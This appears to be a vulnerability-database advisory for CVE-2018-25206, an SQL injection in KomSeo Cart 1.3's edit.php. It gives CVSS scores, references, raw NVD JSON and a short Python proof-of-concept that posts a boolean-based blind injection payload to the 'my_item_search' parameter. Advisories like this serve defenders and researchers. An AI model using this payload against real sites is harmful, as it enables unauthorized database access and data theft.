Security Vulnerability Report
中文
CVE-2018-25206 CVSS 8.2 HIGH

CVE-2018-25206

Published: 2026-03-26 12:16:06
Last Modified: 2026-05-01 15:23:27

Description

KomSeo Cart 1.3 contains an SQL injection vulnerability that allows attackers to inject SQL commands through the 'my_item_search' parameter in edit.php. Attackers can submit POST requests with malicious SQL payloads to extract sensitive database information using boolean-based blind or error-based injection techniques.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KomSeo Cart 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(url): # Target endpoint based on the description target_url = f"{url}/edit.php" # Payload for boolean-based blind SQL injection # Checking if the first character of the database version is '5' (common for MySQL 5.x) payload = "1' AND SUBSTRING(VERSION(), 1, 1) = '5-- -" data = { 'my_item_search': payload } try: response = requests.post(target_url, data=data, timeout=10) # Analyze response to determine vulnerability # In a real scenario, you would compare response length or specific content indicators if response.status_code == 200: print("[+] Request sent successfully. Check response content manually for indicators.") print(f"Response Length: {len(response.text)}") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to server: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com" check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25206", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:05.650", "lastModified": "2026-05-01T15:23:27.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "KomSeo Cart 1.3 contains an SQL injection vulnerability that allows attackers to inject SQL commands through the 'my_item_search' parameter in edit.php. Attackers can submit POST requests with malicious SQL payloads to extract sensitive database information using boolean-based blind or error-based injection techniques."}, {"lang": "es", "value": "KomSeo Cart 1.3 contiene una vulnerabilidad de inyección SQL que permite a los atacantes inyectar comandos SQL a través del parámetro 'my_item_search' en edit.php. Los atacantes pueden enviar solicitudes POST con cargas útiles SQL maliciosas para extraer información sensible de la base de datos utilizando técnicas de inyección ciega basada en booleanos o basada en errores."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://sitemakin.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44753", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/komseo-cart-sql-injection-via-edit-php", "source": "[email protected]"}]}}